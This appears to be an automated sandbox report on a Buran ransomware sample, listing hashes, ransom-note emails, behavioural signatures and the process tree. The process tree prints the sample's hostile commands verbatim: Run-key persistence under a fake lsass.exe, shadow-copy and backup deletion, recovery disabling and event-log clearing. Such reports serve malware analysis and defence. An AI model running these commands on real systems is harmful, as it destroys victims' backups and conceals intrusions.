Analysis
-
max time kernel
151s -
max time network
124s -
platform
windows10_x64 -
resource
win10v20201028 -
submitted
02-02-2021 01:49
Static task
static1
Behavioral task
behavioral1
Sample
buran.exe
Resource
win7v20201028
Behavioral task
behavioral2
Sample
buran.exe
Resource
win10v20201028
General
-
Target
buran.exe
-
Size
222KB
-
MD5
3058d76e5fb2f2d2f65e232e98536182
-
SHA1
3e6e9abd6241526bf932885d118cbbe54e4e1cbe
-
SHA256
5c1141aa7d0b9fba71822607f3b1b086e2cc4529e63221a9a6ede74fa366512f
-
SHA512
b47bc559e183abe8d4be8e7b1f652f01bab0095bf37797d95a541d729dad82a8a1eb1a804bc7c009ab3d49b446498a2e6b487f680bb203df3e17c212f85dfd95
Malware Config
Extracted
C:\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT
buran
Wiederherstellung@cock.li
Wiederherstellungsdatei@airmail.cc
Signatures
-
Buran
Ransomware-as-a-service based on the VegaLocker family first identified in 2019.
-
Clears Windows event logs 1 TTPs
-
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Executes dropped EXE 3 IoCs
Processes:
lsass.exelsass.exelsass.exepid process 1636 lsass.exe 3836 lsass.exe 1380 lsass.exe -
Adds Run key to start application 2 TTPs 2 IoCs
Processes:
reg.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Windows\CurrentVersion\Run reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Windows\CurrentVersion\Run\Local Security Authority Subsystem Service = "\"C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\lsass.exe\" -start" reg.exe -
Enumerates connected drives 3 TTPs 24 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
lsass.exedescription ioc process File opened (read-only) \??\H: lsass.exe File opened (read-only) \??\F: lsass.exe File opened (read-only) \??\Y: lsass.exe File opened (read-only) \??\T: lsass.exe File opened (read-only) \??\K: lsass.exe File opened (read-only) \??\Z: lsass.exe File opened (read-only) \??\R: lsass.exe File opened (read-only) \??\U: lsass.exe File opened (read-only) \??\S: lsass.exe File opened (read-only) \??\N: lsass.exe File opened (read-only) \??\J: lsass.exe File opened (read-only) \??\I: lsass.exe File opened (read-only) \??\E: lsass.exe File opened (read-only) \??\X: lsass.exe File opened (read-only) \??\V: lsass.exe File opened (read-only) \??\A: lsass.exe File opened (read-only) \??\P: lsass.exe File opened (read-only) \??\O: lsass.exe File opened (read-only) \??\M: lsass.exe File opened (read-only) \??\L: lsass.exe File opened (read-only) \??\G: lsass.exe File opened (read-only) \??\B: lsass.exe File opened (read-only) \??\W: lsass.exe File opened (read-only) \??\Q: lsass.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 8 geoiptool.com -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Drops file in Program Files directory 21789 IoCs
Processes:
lsass.exedescription ioc process File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\rarrow.gif.[17C729A0-DE24-D128-25CD-456E344875E9] lsass.exe File created C:\Program Files\VideoLAN\VLC\locale\ga\LC_MESSAGES\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT lsass.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Assets\Themes\Jumbo\jumbo_13d.png lsass.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1611.10393.0_x64__8wekyb3d8bbwe\Assets\SecondaryTiles\Directions\Car\LTR\contrast-black\SmallTile.scale-200.png lsass.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\sl-sl\ui-strings.js lsass.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.feature_3.9.0.v20140827-1444\META-INF\MANIFEST.MF.[17C729A0-DE24-D128-25CD-456E344875E9] lsass.exe File opened for modification C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsMaps_5.1611.10393.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\SecondaryTiles\Home\contrast-black\MedTile.scale-125.png lsass.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.People_10.1.10531.0_x64__8wekyb3d8bbwe\AppxBlockMap.xml lsass.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.204.0_x64__kzf8qxf38zg5c\SkypeApp\Designs\Flags\large\bv_60x42.png lsass.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1702.312.0_x64__8wekyb3d8bbwe\Assets\CalculatorAppList.targetsize-32_altform-unplated_contrast-black.png lsass.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\7834_32x32x32.png lsass.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\O365BusinessR_SubTest-ul-oob.xrm-ms.[17C729A0-DE24-D128-25CD-456E344875E9] lsass.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\Fonts\private\DUBAI-BOLD.TTF lsass.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.3DBuilder_13.0.10349.0_x64__8wekyb3d8bbwe\Assets\CubeTile_contrast-white.png lsass.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.MicrosoftOfficeHub_17.8010.5926.0_x64__8wekyb3d8bbwe\images\OfficeHubLogo_310x150.png lsass.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\S_IlluCCFilesEmpty_180x180.svg lsass.exe File opened for modification C:\Program Files\Microsoft Office\root\Document Themes 16\Ion.thmx lsass.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\O365SmallBusPremR_SubTrial3-ul-oob.xrm-ms lsass.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Assets\GamePlayAssets\Localization\localized_DE-DE.respack lsass.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Office.OneNote_17.7668.58071.0_x64__8wekyb3d8bbwe\images\contrast-white\OneNoteAppList.targetsize-32_altform-unplated.png lsass.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsFeedbackHub_1.1612.10312.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\InsiderHubWideTile.scale-100_contrast-white.png lsass.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\Pages_R_RHP.aapp.[17C729A0-DE24-D128-25CD-456E344875E9] lsass.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.MSPaint_1.1702.28017.0_x64__8wekyb3d8bbwe\Assets\Images\Stickers\Sticker_WorriedEye.png lsass.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.204.0_x64__kzf8qxf38zg5c\SkypeApp\Assets\SkypeAppList.scale-200.png lsass.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1611.10393.0_x64__8wekyb3d8bbwe\Assets\SecondaryTiles\Home\contrast-black\LargeTile.scale-200.png lsass.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\themes\dark\s_filetype_psd.svg lsass.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\acrobat_parcel_generic_32.svg.[17C729A0-DE24-D128-25CD-456E344875E9] lsass.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Assets\Buttons\Undo\Undo-press.mobile.png lsass.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Assets\Icons\friends_activity.png lsass.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.204.0_x64__kzf8qxf38zg5c\SkypeApp\Designs\Flags\small\et_16x11.png lsass.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\contrast-black\ExchangeWideTile.scale-200.png lsass.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.16112.11621.0_x64__8wekyb3d8bbwe\Assets\contrast-black\AppList.targetsize-64_contrast-black.png lsass.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\com.jrockit.mc.feature.flightrecorder_5.5.0.165303\feature.properties.[17C729A0-DE24-D128-25CD-456E344875E9] lsass.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\com.jrockit.mc.feature.rcp.ja_5.5.0.165303\feature.xml lsass.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\update_tracking\org-netbeans-modules-javahelp.xml lsass.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\Excel2019VL_MAK_AE-ul-oob.xrm-ms.[17C729A0-DE24-D128-25CD-456E344875E9] lsass.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsStore_11701.1001.87.0_x64__8wekyb3d8bbwe\Resources\Fonts\StorMDL2.ttf lsass.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\SearchEmail.png.[17C729A0-DE24-D128-25CD-456E344875E9] lsass.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_filter-dark-focus_32.svg.[17C729A0-DE24-D128-25CD-456E344875E9] lsass.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\themes\dark\text_2x.png.[17C729A0-DE24-D128-25CD-456E344875E9] lsass.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\images\themes\dark\files_icons.png.[17C729A0-DE24-D128-25CD-456E344875E9] lsass.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\Microsoft.Mashup.Container.exe.config lsass.exe File created C:\Program Files\Java\jdk1.8.0_66\db\bin\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT lsass.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\lib\gimap.jar lsass.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1702.312.0_x64__8wekyb3d8bbwe\Assets\CalculatorAppList.targetsize-80_altform-unplated_contrast-white.png lsass.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\delete.svg.[17C729A0-DE24-D128-25CD-456E344875E9] lsass.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\zh-cn\ui-strings.js lsass.exe File opened for modification C:\Program Files\MeasureGroup.7z.[17C729A0-DE24-D128-25CD-456E344875E9] lsass.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.16112.11621.0_neutral_resources.scale-150_8wekyb3d8bbwe\Assets\AppList.scale-150.png lsass.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\js\nls\fr-fr\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT lsass.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\images\themes\dark\bg_pattern_RHP.png lsass.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\PowerPointR_OEM_Perp-pl.xrm-ms.[17C729A0-DE24-D128-25CD-456E344875E9] lsass.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.204.0_x64__kzf8qxf38zg5c\SkypeApp\Designs\Emoticons\small\lipssealed.png lsass.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsAlarms_10.1702.333.0_x64__8wekyb3d8bbwe\Assets\AlarmsAppList.contrast-black_targetsize-30.png lsass.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\ext\access-bridge-64.jar.[17C729A0-DE24-D128-25CD-456E344875E9] lsass.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.swt.win32.win32.x86_64.nl_zh_4.4.0.v20140623020002.jar.[17C729A0-DE24-D128-25CD-456E344875E9] lsass.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\ClientLangPack_eula.txt.[17C729A0-DE24-D128-25CD-456E344875E9] lsass.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\ECHO\ECHO.ELM.[17C729A0-DE24-D128-25CD-456E344875E9] lsass.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\es\LC_MESSAGES\vlc.mo lsass.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\zh-cn\ui-strings.js lsass.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.e4.rcp_1.3.100.v20141007-2033\META-INF\MANIFEST.MF lsass.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-lib-uihandler_ja.jar.[17C729A0-DE24-D128-25CD-456E344875E9] lsass.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\release.[17C729A0-DE24-D128-25CD-456E344875E9] lsass.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1702.312.0_x64__8wekyb3d8bbwe\Assets\CalculatorAppList.targetsize-72_altform-unplated.png lsass.exe -
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
Processes:
vssadmin.exepid process 3820 vssadmin.exe -
Processes:
buran.exedescription ioc process Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c0000000100000004000000000800000f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e buran.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 buran.exe -
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 52 IoCs
Processes:
lsass.exeWMIC.exevssvc.exewevtutil.exewevtutil.exewevtutil.exedescription pid process Token: SeDebugPrivilege 1636 lsass.exe Token: SeIncreaseQuotaPrivilege 188 WMIC.exe Token: SeSecurityPrivilege 188 WMIC.exe Token: SeTakeOwnershipPrivilege 188 WMIC.exe Token: SeLoadDriverPrivilege 188 WMIC.exe Token: SeSystemProfilePrivilege 188 WMIC.exe Token: SeSystemtimePrivilege 188 WMIC.exe Token: SeProfSingleProcessPrivilege 188 WMIC.exe Token: SeIncBasePriorityPrivilege 188 WMIC.exe Token: SeCreatePagefilePrivilege 188 WMIC.exe Token: SeBackupPrivilege 188 WMIC.exe Token: SeRestorePrivilege 188 WMIC.exe Token: SeShutdownPrivilege 188 WMIC.exe Token: SeDebugPrivilege 188 WMIC.exe Token: SeSystemEnvironmentPrivilege 188 WMIC.exe Token: SeRemoteShutdownPrivilege 188 WMIC.exe Token: SeUndockPrivilege 188 WMIC.exe Token: SeManageVolumePrivilege 188 WMIC.exe Token: 33 188 WMIC.exe Token: 34 188 WMIC.exe Token: 35 188 WMIC.exe Token: 36 188 WMIC.exe Token: SeIncreaseQuotaPrivilege 188 WMIC.exe Token: SeSecurityPrivilege 188 WMIC.exe Token: SeTakeOwnershipPrivilege 188 WMIC.exe Token: SeLoadDriverPrivilege 188 WMIC.exe Token: SeSystemProfilePrivilege 188 WMIC.exe Token: SeSystemtimePrivilege 188 WMIC.exe Token: SeProfSingleProcessPrivilege 188 WMIC.exe Token: SeIncBasePriorityPrivilege 188 WMIC.exe Token: SeCreatePagefilePrivilege 188 WMIC.exe Token: SeBackupPrivilege 188 WMIC.exe Token: SeRestorePrivilege 188 WMIC.exe Token: SeShutdownPrivilege 188 WMIC.exe Token: SeDebugPrivilege 188 WMIC.exe Token: SeSystemEnvironmentPrivilege 188 WMIC.exe Token: SeRemoteShutdownPrivilege 188 WMIC.exe Token: SeUndockPrivilege 188 WMIC.exe Token: SeManageVolumePrivilege 188 WMIC.exe Token: 33 188 WMIC.exe Token: 34 188 WMIC.exe Token: 35 188 WMIC.exe Token: 36 188 WMIC.exe Token: SeBackupPrivilege 4088 vssvc.exe Token: SeRestorePrivilege 4088 vssvc.exe Token: SeAuditPrivilege 4088 vssvc.exe Token: SeSecurityPrivilege 2120 wevtutil.exe Token: SeBackupPrivilege 2120 wevtutil.exe Token: SeSecurityPrivilege 2748 wevtutil.exe Token: SeBackupPrivilege 2748 wevtutil.exe Token: SeSecurityPrivilege 1400 wevtutil.exe Token: SeBackupPrivilege 1400 wevtutil.exe -
Suspicious use of WriteProcessMemory 102 IoCs
Processes:
buran.execmd.execmd.exelsass.execmd.execmd.execmd.execmd.execmd.exedescription pid process target process PID 1052 wrote to memory of 208 1052 buran.exe cmd.exe PID 1052 wrote to memory of 208 1052 buran.exe cmd.exe PID 1052 wrote to memory of 208 1052 buran.exe cmd.exe PID 208 wrote to memory of 2540 208 cmd.exe reg.exe PID 208 wrote to memory of 2540 208 cmd.exe reg.exe PID 208 wrote to memory of 2540 208 cmd.exe reg.exe PID 1052 wrote to memory of 1636 1052 buran.exe lsass.exe PID 1052 wrote to memory of 1636 1052 buran.exe lsass.exe PID 1052 wrote to memory of 1636 1052 buran.exe lsass.exe PID 1052 wrote to memory of 1056 1052 buran.exe cmd.exe PID 1052 wrote to memory of 1056 1052 buran.exe cmd.exe PID 1052 wrote to memory of 1056 1052 buran.exe cmd.exe PID 1056 wrote to memory of 2100 1056 cmd.exe PING.EXE PID 1056 wrote to memory of 2100 1056 cmd.exe PING.EXE PID 1056 wrote to memory of 2100 1056 cmd.exe PING.EXE PID 1636 wrote to memory of 2356 1636 lsass.exe cmd.exe PID 1636 wrote to memory of 2356 1636 lsass.exe cmd.exe PID 1636 wrote to memory of 2356 1636 lsass.exe cmd.exe PID 1636 wrote to memory of 3184 1636 lsass.exe cmd.exe PID 1636 wrote to memory of 3184 1636 lsass.exe cmd.exe PID 1636 wrote to memory of 3184 1636 lsass.exe cmd.exe PID 1636 wrote to memory of 3012 1636 lsass.exe cmd.exe PID 1636 wrote to memory of 3012 1636 lsass.exe cmd.exe PID 1636 wrote to memory of 3012 1636 lsass.exe cmd.exe PID 1636 wrote to memory of 3588 1636 lsass.exe cmd.exe PID 1636 wrote to memory of 3588 1636 lsass.exe cmd.exe PID 1636 wrote to memory of 3588 1636 lsass.exe cmd.exe PID 1636 wrote to memory of 3204 1636 lsass.exe cmd.exe PID 1636 wrote to memory of 3204 1636 lsass.exe cmd.exe PID 1636 wrote to memory of 3204 1636 lsass.exe cmd.exe PID 1636 wrote to memory of 1160 1636 lsass.exe cmd.exe PID 1636 wrote to memory of 1160 1636 lsass.exe cmd.exe PID 1636 wrote to memory of 1160 1636 lsass.exe cmd.exe PID 1636 wrote to memory of 2504 1636 lsass.exe cmd.exe PID 1636 wrote to memory of 2504 1636 lsass.exe cmd.exe PID 1636 wrote to memory of 2504 1636 lsass.exe cmd.exe PID 2504 wrote to memory of 188 2504 cmd.exe WMIC.exe PID 2504 wrote to memory of 188 2504 cmd.exe WMIC.exe PID 2504 wrote to memory of 188 2504 cmd.exe WMIC.exe PID 1636 wrote to memory of 2208 1636 lsass.exe cmd.exe PID 1636 wrote to memory of 2208 1636 lsass.exe cmd.exe PID 1636 wrote to memory of 2208 1636 lsass.exe cmd.exe PID 2208 wrote to memory of 3820 2208 cmd.exe vssadmin.exe PID 2208 wrote to memory of 3820 2208 cmd.exe vssadmin.exe PID 2208 wrote to memory of 3820 2208 cmd.exe vssadmin.exe PID 1636 wrote to memory of 3052 1636 lsass.exe cmd.exe PID 1636 wrote to memory of 3052 1636 lsass.exe cmd.exe PID 1636 wrote to memory of 3052 1636 lsass.exe cmd.exe PID 3052 wrote to memory of 3576 3052 cmd.exe reg.exe PID 3052 wrote to memory of 3576 3052 cmd.exe reg.exe PID 3052 wrote to memory of 3576 3052 cmd.exe reg.exe PID 1636 wrote to memory of 496 1636 lsass.exe cmd.exe PID 1636 wrote to memory of 496 1636 lsass.exe cmd.exe PID 1636 wrote to memory of 496 1636 lsass.exe cmd.exe PID 496 wrote to memory of 2392 496 cmd.exe reg.exe PID 496 wrote to memory of 2392 496 cmd.exe reg.exe PID 496 wrote to memory of 2392 496 cmd.exe reg.exe PID 1636 wrote to memory of 2588 1636 lsass.exe cmd.exe PID 1636 wrote to memory of 2588 1636 lsass.exe cmd.exe PID 1636 wrote to memory of 2588 1636 lsass.exe cmd.exe PID 2588 wrote to memory of 2452 2588 cmd.exe reg.exe PID 2588 wrote to memory of 2452 2588 cmd.exe reg.exe PID 2588 wrote to memory of 2452 2588 cmd.exe reg.exe PID 1636 wrote to memory of 1276 1636 lsass.exe cmd.exe -
Views/modifies file attributes 1 TTPs 1 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\buran.exe"C:\Users\Admin\AppData\Local\Temp\buran.exe"1⤵
- Modifies system certificate store
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /e:on /c md "C:\Users\Admin\AppData\Roaming\Microsoft\Windows" & copy "C:\Users\Admin\AppData\Local\Temp\buran.exe" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\lsass.exe" & reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /V "Local Security Authority Subsystem Service" /t REG_SZ /F /D "\"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\lsass.exe\" -start"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /V "Local Security Authority Subsystem Service" /t REG_SZ /F /D "\"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\lsass.exe\" -start"3⤵
- Adds Run key to start application
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\lsass.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\lsass.exe" -start2⤵
- Executes dropped EXE
- Enumerates connected drives
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C bcdedit /set {default} bootstatuspolicy ignoreallfailures3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C bcdedit /set {default} recoveryenabled no3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C wbadmin delete catalog -quiet3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C wbadmin delete systemstatebackup3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C wbadmin delete systemstatebackup -keepversions:03⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C wbadmin delete backup3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C wmic shadowcopy delete3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic shadowcopy delete4⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C vssadmin delete shadows /all /quiet3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\vssadmin.exevssadmin delete shadows /all /quiet4⤵
- Interacts with shadow copies
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default" /va /f3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\reg.exereg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default" /va /f4⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" /f3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\reg.exereg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" /f4⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C reg add "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\reg.exereg add "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers"4⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C attrib "%userprofile%\documents\Default.rdp" -s -h3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib "C:\Users\Admin\documents\Default.rdp" -s -h4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C del "%userprofile%\documents\Default.rdp"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C wevtutil.exe clear-log Application3⤵
-
C:\Windows\SysWOW64\wevtutil.exewevtutil.exe clear-log Application4⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C wevtutil.exe clear-log Security3⤵
-
C:\Windows\SysWOW64\wevtutil.exewevtutil.exe clear-log Security4⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C wevtutil.exe clear-log System3⤵
